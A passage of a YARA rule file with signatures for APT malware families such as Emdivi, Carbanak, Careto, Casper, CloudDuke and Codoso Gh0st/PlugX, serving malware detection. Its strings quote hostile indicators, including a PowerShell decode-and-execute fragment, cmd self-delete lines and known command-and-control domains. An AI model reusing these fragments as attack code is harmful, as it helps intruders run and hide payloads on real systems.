    $s2 = "\\Mozilla\\Firefox\\Profiles\\" ascii fullword
    $s4 = "\\auto.cfg" ascii fullword
    $s5 = "/ncsi.txt" ascii fullword
    $s6 = "/en-us/default.aspx" ascii fullword
    $s7 = "cmd /c" ascii fullword
    $s9 = "APPDATA" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 870400 and (($x1 and 1 of ($s*)) or (4 of ($s*)))
}

rule Emdivi_Gen4 {
  meta:
    description = "Detects Emdivi Malware"
    author = "Florian Roth @Cyber0ps"
    reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
    date = "2015-08-20"
    super_rule = 1
    score = 80
    hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
    hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
    hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
    hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
    hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
    hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
  strings:
    $s1 = ".http_port\", " wide fullword
    $s2 = "UserAgent: " ascii fullword
    $s3 = "AUTH FAILED" ascii fullword
    $s4 = "INVALID FILE PATH" ascii fullword
    $s5 = ".autoconfig_url\", \"" wide fullword
    $s6 = "FAILED TO WRITE FILE" ascii fullword
    $s7 = ".proxy" wide fullword
    $s8 = "AuthType: " ascii fullword
    $s9 = ".no_proxies_on\", \"" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 873472 and all of them
}

rule apt_c16_win_memory_pcclient {
  meta:
    author = "@dragonthreatlab"
    md5 = "ec532bbe9d0882d403473102e9724557"
    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
    date = "2015/01/11"
    reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
  strings:
    $str1 = "Kill You" ascii
    $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
    $str3 = "%4.2f  KB" ascii
    $encodefunc = { 8A 08 32 CA 02 CA 88 08 40 4E 75 F4 }
  condition:
    all of them
}

rule apt_c16_win_disk_pcclient {
  meta:
    author = "@dragonthreatlab"
    md5 = "55f84d88d84c221437cd23cdbc541d2e"
    description = "Encoded version of pcclient found on disk"
    date = "2015/01/11"
    reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
  strings:
    $header = { 51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06 }
  condition:
    $header at 0
}

rule apt_c16_win32_dropper {
  meta:
    author = "@dragonthreatlab"
    md5 = "ad17eff26994df824be36db246c8fb6a"
    description = "APT malware used to drop PcClient RAT"
    date = "2015/01/11"
    reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
  strings:
    $mz = { 4D 5A }
    $str1 = "clbcaiq.dll" ascii
    $str2 = "profapi_104" ascii
    $str3 = "/ShowWU" ascii
    $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
    $str5 = { 8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E }
  condition:
    $mz at 0 and all of ($str*)
}

rule apt_c16_win_swisyn {
  meta:
    author = "@dragonthreatlab"
    md5 = "a6a18c846e5179259eba9de238f67e41"
    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
    date = "2015/01/11"
    reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
  strings:
    $mz = { 4D 5A }
    $str1 = "/ShowWU" ascii
    $str2 = "IsWow64Process"
    $str3 = "regsvr32 "
    $str4 = { 8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10 }
  condition:
    $mz at 0 and all of ($str*)
}

rule apt_c16_win_wateringhole {
  meta:
    author = "@dragonthreatlab"
    description = "Detects code from APT wateringhole"
    date = "2015/01/11"
    reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
  strings:
    $str1 = "function runmumaa()"
    $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
    $str3 = "function MoSaklgEs7(k)"
  condition:
    any of ($str*)
}

rule apt_c16_win64_dropper {
  meta:
    author = "@dragonthreatlab"
    date = "2015/01/11"
    description = "APT malware used to drop PcClient RAT"
    reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
  strings:
    $mz = { 4D 5A }
    $str1 = "clbcaiq.dll" ascii
    $str2 = "profapi_104" ascii
    $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
    $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
  condition:
    $mz at 0 and all of ($str*)
}

rule Carbanak_0915_1 {
  meta:
    description = "Carbanak Malware"
    author = "Florian Roth"
    reference = "https://www.csis.dk/en/csis/blog/4710/"
    date = "2015-09-03"
    score = 70
  strings:
    $s1 = "evict1.pdb" ascii fullword
    $s2 = "http://testing.corp 0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 1 of them
}

rule Carbanak_0915_2 {
  meta:
    description = "Carbanak Malware"
    author = "Florian Roth"
    reference = "https://www.csis.dk/en/csis/blog/4710/"
    date = "2015-09-03"
    score = 70
  strings:
    $x1 = "8Rkzy.exe" wide fullword
    $s1 = "Export Template" wide fullword
    $s2 = "Session folder with name '%s' already exists." ascii fullword
    $s3 = "Show Unconnected Endpoints (Ctrl+U)" ascii fullword
    $s4 = "Close All Documents" wide fullword
    $s5 = "Add &Resource" ascii fullword
    $s6 = "PROCEXPLORER" wide fullword
    $s7 = "AssocQueryKeyA" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and ($x1 or all of ($s*))
}

rule Carbanak_0915_3 {
  meta:
    description = "Carbanak Malware"
    author = "Florian Roth"
    reference = "https://www.csis.dk/en/csis/blog/4710/"
    date = "2015-09-03"
    score = 70
  strings:
    $s1 = "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww" ascii fullword
    $s2 = "SHInvokePrinterCommandA" ascii fullword
    $s3 = "Ycwxnkaj" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 716800 and all of them
}

rule Careto_SGH {
  meta:
    author = "AlienVault (Alberto Ortega)"
    description = "TheMask / Careto SGH component signature"
    reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
    date = "2014/02/11"
  strings:
    $m1 = "PGPsdkDriver" ascii wide fullword
    $m2 = "jpeg1x32" ascii wide fullword
    $m3 = "SkypeIE6Plugin" ascii wide fullword
    $m4 = "CDllUninstall" ascii wide fullword
  condition:
    2 of them
}

rule Careto_OSX_SBD {
  meta:
    author = "AlienVault (Alberto Ortega)"
    description = "TheMask / Careto OSX component signature"
    reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
    date = "2014/02/11"
  strings:
    $1 = { FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12 }
  condition:
    all of them
}

rule Careto_CnC {
  meta:
    author = "AlienVault (Alberto Ortega)"
    description = "TheMask / Careto CnC communication signature"
    reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
    date = "2014/02/11"
  strings:
    $1 = "cgi-bin/commcgi.cgi" ascii wide
    $2 = "Group" ascii wide
    $3 = "Install" ascii wide
    $4 = "Bn" ascii wide
  condition:
    all of them
}

rule Careto_CnC_domains {
  meta:
    author = "AlienVault (Alberto Ortega)"
    description = "TheMask / Careto known command and control domains"
    reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
    date = "2014/02/11"
  strings:
    $1 = "linkconf.net" ascii wide nocase
    $2 = "redirserver.net" ascii wide nocase
    $3 = "swupdt.com" ascii wide nocase
  condition:
    any of them
}

rule Casper_Backdoor_x86 {
  meta:
    description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
    author = "Florian Roth"
    reference = "http://goo.gl/VRJNLo"
    date = "2015/03/05"
    hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
    score = 80
  strings:
    $s1 = "\"svchost.exe\"" wide fullword
    $s2 = "firefox.exe" ascii fullword
    $s3 = "\"Host Process for Windows Services\"" wide fullword
    $x1 = "\\Users\\*" ascii fullword
    $x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" ascii fullword
    $x3 = "\\Mozilla\\Firefox\\Profiles\\*" ascii fullword
    $x4 = "\\Documents and Settings\\*" ascii fullword
    $y1 = "%s; %S=%S" wide fullword
    $y2 = "%s; %s=%s" ascii fullword
    $y3 = "Cookie: %s=%s" ascii fullword
    $y4 = "http://%S:%d" wide fullword
    $z1 = "http://google.com/" ascii fullword
    $z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" ascii fullword
    $z3 = "Operating System\"" wide fullword
  condition:
    (all of ($s*)) or (3 of ($x*) and 2 of ($y*) and 2 of ($z*))
}

rule Casper_EXE_Dropper {
  meta:
    description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
    author = "Florian Roth"
    reference = "http://goo.gl/VRJNLo"
    date = "2015/03/05"
    hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
    score = 80
  strings:
    $s0 = "<Command>" ascii fullword
    $s1 = "</Command>" ascii fullword
    $s2 = "\" /d \"" ascii fullword
    $s4 = "'%s' %s" ascii fullword
    $s5 = "nKERNEL32.DLL" wide fullword
    $s6 = "@ReturnValue" wide fullword
    $s7 = "ID: 0x%x" ascii fullword
    $s8 = "Name: %S" ascii fullword
  condition:
    7 of them
}

rule Casper_Included_Strings {
  meta:
    description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
    author = "Florian Roth"
    reference = "http://goo.gl/VRJNLo"
    date = "2015/03/06"
    score = 50
  strings:
    $a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
    $a1 = "& SYSTEMINFO) ELSE EXIT"
    $mz = { 4D 5A }
    $c1 = "domcommon.exe" wide fullword
    $c2 = "jpic.gov.sy" fullword
    $c3 = "aiomgr.exe" wide fullword
    $c4 = "perfaudio.dat" fullword
    $c5 = "Casper_DLL.dll" fullword
    $c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 }
    $c7 = "{4216567A-4512-9825-7745F856}" fullword
  condition:
    all of ($a*) or ($mz at 0) and (1 of ($c*))
}

rule Casper_SystemInformation_Output {
  meta:
    description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
    author = "Florian Roth"
    reference = "http://goo.gl/VRJNLo"
    date = "2015/03/06"
    score = 70
  strings:
    $a0 = "***** SYSTEM INFORMATION ******"
    $a1 = "***** SECURITY INFORMATION ******"
    $a2 = "Antivirus: "
    $a3 = "Firewall: "
    $a4 = "***** EXECUTION CONTEXT ******"
    $a5 = "Identity: "
    $a6 = "<CONFIG TIMESTAMP="
  condition:
    all of them
}

rule CheshireCat_Sample2 {
  meta:
    description = "Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
    author = "Florian Roth"
    reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
    date = "2015-08-08"
    score = 70
    hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
  strings:
    $s0 = "mpgvwr32.dll" ascii fullword
    $s1 = "Unexpected failure of wait! (%d)" ascii fullword
    $s2 = "\"%s\" /e%d /p%s" ascii fullword
    $s4 = "error in params!" ascii fullword
    $s5 = "sscanf" ascii fullword
    $s6 = "<>Param : 0x%x" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 4 of ($s*)
}

rule CheshireCat_Gen1 {
  meta:
    description = "Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
    author = "Florian Roth"
    reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
    date = "2015-08-08"
    super_rule = 1
    score = 90
    hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
    hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
    hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
    hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
  strings:
    $x1 = "CAPESPN.DLL" wide fullword
    $x2 = "WINF.DLL" wide fullword
    $x3 = "NCFG.DLL" wide fullword
    $x4 = "msgrthlp.dll" wide fullword
    $x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" ascii fullword
    $x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" ascii fullword
    $a1 = "Interface\\%s\\info" ascii fullword
    $a2 = "Interface\\%s\\info\\%s" ascii fullword
    $a3 = "CLSID\\%s\\info\\%s" ascii fullword
    $a4 = "CLSID\\%s\\info" ascii fullword
    $b1 = "Windows Shell Icon Handler" wide fullword
    $b2 = "Microsoft Shell Icon Handler" wide fullword
    $s1 = "\\StringFileInfo\\%s\\FileVersion" ascii fullword
    $s2 = "CLSID\\%s\\AuxCLSID" ascii fullword
    $s3 = "lnkfile\\shellex\\IconHandler" ascii fullword
    $s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" ascii fullword
    $s5 = "%sMutex" ascii fullword
    $s6 = "\\ShellIconCache" ascii fullword
    $s7 = "+6Service Pack " ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 358400 and 7 of ($s*) and 2 of ($a*) and 1 of ($b*) and 1 of ($x*)
}

rule CheshireCat_Gen2 {
  meta:
    description = "Auto-generated rule - from files 32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a, 63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
    author = "Florian Roth"
    reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
    date = "2015-08-08"
    super_rule = 1
    score = 70
    hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
    hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
    hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
    hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
  strings:
    $a1 = "Interface\\%s\\info" ascii fullword
    $a2 = "Interface\\%s\\info\\%s" ascii fullword
    $a3 = "CLSID\\%s\\info\\%s" ascii fullword
    $a4 = "CLSID\\%s\\info" ascii fullword
    $b1 = "Windows Shell Icon Handler" wide fullword
    $b2 = "Microsoft Shell Icon Handler" wide fullword
    $s1 = "\\StringFileInfo\\%s\\FileVersion" ascii fullword
    $s2 = "CLSID\\%s\\AuxCLSID" ascii fullword
    $s3 = "lnkfile\\shellex\\IconHandler" ascii fullword
    $s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" ascii fullword
    $s5 = "%sMutex" ascii fullword
    $s6 = "\\ShellIconCache" ascii fullword
    $s7 = "+6Service Pack " ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and 7 of ($s*) and 2 of ($a*) and 1 of ($b*)
}

rule CloudDuke_Malware {
  meta:
    description = "Detects CloudDuke Malware"
    author = "Florian Roth"
    reference = "https://www.f-secure.com/weblog/archives/00002822.html"
    date = "2015-07-22"
    score = 60
    hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
    hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
    hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
    hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
    hash5 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
    hash6 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
    hash7 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
    hash8 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
    hash9 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
    hash10 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
    hash11 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
    hash12 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
    hash13 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
    hash14 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
    hash15 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
  strings:
    $s1 = "ProcDataWrap" ascii fullword
    $s2 = "imagehlp.dll" ascii fullword
    $s3 = "dnlibsh" ascii fullword
    $s4 = "%ws_out%ws" wide fullword
    $s5 = "Akernel32.dll" wide fullword
    $op0 = { 0F B6 80 68 0E 41 00 0B C8 C1 E1 08 0F B6 C2 8B }
    $op1 = { 8B CE E8 F8 01 00 00 85 C0 74 41 83 7D F8 00 0F }
    $op2 = { E8 2F A2 FF FF 83 20 00 83 C8 FF 5F 5E 5D C3 55 }
  condition:
    uint16(0) == 23117 and filesize < 737280 and 4 of ($s*) and 1 of ($op*)
}

rule SFXRAR_Acrotray {
  meta:
    description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
    author = "Florian Roth"
    reference = "https://www.f-secure.com/weblog/archives/00002822.html"
    date = "2015-07-22"
    super_rule = 1
    score = 70
    hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
    hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
    hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
  strings:
    $s1 = "winrarsfxmappingfile.tmp" wide fullword
    $s2 = "GETPASSWORD1" wide fullword
    $s3 = "acrotray.exe" ascii fullword
    $s4 = "CryptUnprotectMemory failed" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 2507776 and all of them
}

rule Cobalt_functions {
  meta:
    author = "@j0sm1"
    url = "https://www.securityartwork.es/2017/06/16/analisis-del-powershell-usado-fin7/"
    description = "Detect functions coded with ROR edi,D; Detect CobaltStrike used by differents groups APT"
  strings:
    $h1 = { 58 A4 53 E5 }
    $h2 = { 4C 77 26 07 }
    $h3 = { 6A C9 9C C9 }
    $h4 = { 44 F0 35 E0 }
    $h5 = { F4 00 8E CC }
  condition:
    2 of ($h*)
}

rule Codoso_PlugX_3 {
  meta:
    description = "Detects Codoso APT PlugX Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
  strings:
    $s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." wide fullword
    $s2 = "mcs.exe" ascii fullword
    $s3 = "McAltLib.dll" ascii fullword
    $s4 = "WinRAR self-extracting archive" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1228800 and all of them
}

rule Codoso_PlugX_2 {
  meta:
    description = "Detects Codoso APT PlugX Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
  strings:
    $s1 = "%TEMP%\\HID" wide fullword
    $s2 = "%s\\hid.dll" wide fullword
    $s3 = "%s\\SOUNDMAN.exe" wide fullword
    $s4 = "\"%s\\SOUNDMAN.exe\" %d %d" wide fullword
    $s5 = "%s\\HID.dllx" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 3 of them) or all of them
}

rule Codoso_CustomTCP_4 {
  meta:
    description = "Detects Codoso APT CustomTCP Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
    hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
    hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
    hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
  strings:
    $x1 = "varus_service_x86.dll" ascii fullword
    $s1 = "/s %s /p %d /st %d /rt %d" ascii fullword
    $s2 = "net start %%1" ascii fullword
    $s3 = "ping 127.1 > nul" ascii fullword
    $s4 = "McInitMISPAlertEx" ascii fullword
    $s5 = "sc start %%1" ascii fullword
    $s6 = "net stop %%1" ascii fullword
    $s7 = "WorkerRun" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 5 of them) or ($x1 and 2 of ($s*))
}

rule Codoso_CustomTCP_3 {
  meta:
    description = "Detects Codoso APT CustomTCP Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
  strings:
    $s1 = "DnsApi.dll" ascii fullword
    $s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
    $s3 = "CONNECT %s:%d hTTP/1.1" ascii
    $s4 = "CONNECT %s:%d HTTp/1.1" ascii
    $s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
    $s6 = "iphlpapi.dll" ascii
    $s7 = "%systemroot%\\Web\\" ascii
    $s8 = "Proxy-Authorization: Negotiate %s" ascii
    $s9 = "CLSID\\{%s}\\InprocServer32" ascii
  condition:
    (uint16(0) == 23117 and filesize < 512000 and 5 of them) or 7 of them
}

rule Codoso_CustomTCP_2 {
  meta:
    description = "Detects Codoso APT CustomTCP Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
  strings:
    $s1 = "varus_service_x86.dll" ascii fullword
    $s2 = "/s %s /p %d /st %d /rt %d" ascii fullword
    $s3 = "net start %%1" ascii fullword
    $s4 = "ping 127.1 > nul" ascii fullword
    $s5 = "McInitMISPAlertEx" ascii fullword
    $s6 = "sc start %%1" ascii fullword
    $s7 = "B_WKNDNSK^" ascii fullword
    $s8 = "net stop %%1" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 415744 and all of them
}

rule Codoso_PGV_PVID_6 {
  meta:
    description = "Detects Codoso APT PGV_PVID Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
  strings:
    $s0 = "rundll32 \"%s\",%s" ascii fullword
    $s1 = "/c ping 127.%d & del \"%s\"" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 6144000 and all of them
}

rule Codoso_Gh0st_3 {
  meta:
    description = "Detects Codoso APT Gh0st Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
  strings:
    $x1 = "RunMeByDLL32" ascii fullword
    $s1 = "svchost.dll" wide fullword
    $s2 = "server.dll" ascii fullword
    $s3 = "Copyright ? 2008" wide fullword
    $s4 = "testsupdate33" ascii fullword
    $s5 = "Device Protect Application" wide fullword
    $s6 = "MSVCP60.DLL" ascii fullword
    $s7 = "mail-news.eicp.net" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 199680 and $x1 or 4 of them
}

rule Codoso_Gh0st_2 {
  meta:
    description = "Detects Codoso APT Gh0st Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
  strings:
    $s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" ascii fullword
    $s1 = "rundll32.exe \"%s\", RunMeByDLL32" ascii fullword
    $s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" wide fullword
    $s14 = "%s -r debug 1" ascii fullword
    $s15 = "\\\\.\\keymmdrv1" ascii fullword
    $s17 = "RunMeByDLL32" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and 1 of them
}

rule Codoso_CustomTCP {
  meta:
    description = "Codoso CustomTCP Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
  strings:
    $s4 = "wnyglw" ascii fullword
    $s5 = "WorkerRun" ascii fullword
    $s7 = "boazdcd" ascii fullword
    $s8 = "wayflw" ascii fullword
    $s9 = "CODETABL" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 414720 and all of them
}

rule Codoso_PGV_PVID_5 {
  meta:
    description = "Detects Codoso APT PGV PVID Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
    hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
  strings:
    $s1 = "/c del %s >> NUL" ascii fullword
    $s2 = "%s%s.manifest" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and all of them
}

rule Codoso_Gh0st_1 {
  meta:
    description = "Detects Codoso APT Gh0st Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
    hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
    hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
  strings:
    $x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" ascii fullword
    $x2 = "rundll32.exe \"%s\", RunMeByDLL32" ascii fullword
    $x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" wide fullword
    $x4 = "\\\\.\\keymmdrv1" ascii fullword
    $s1 = "spideragent.exe" ascii fullword
    $s2 = "AVGIDSAgent.exe" ascii fullword
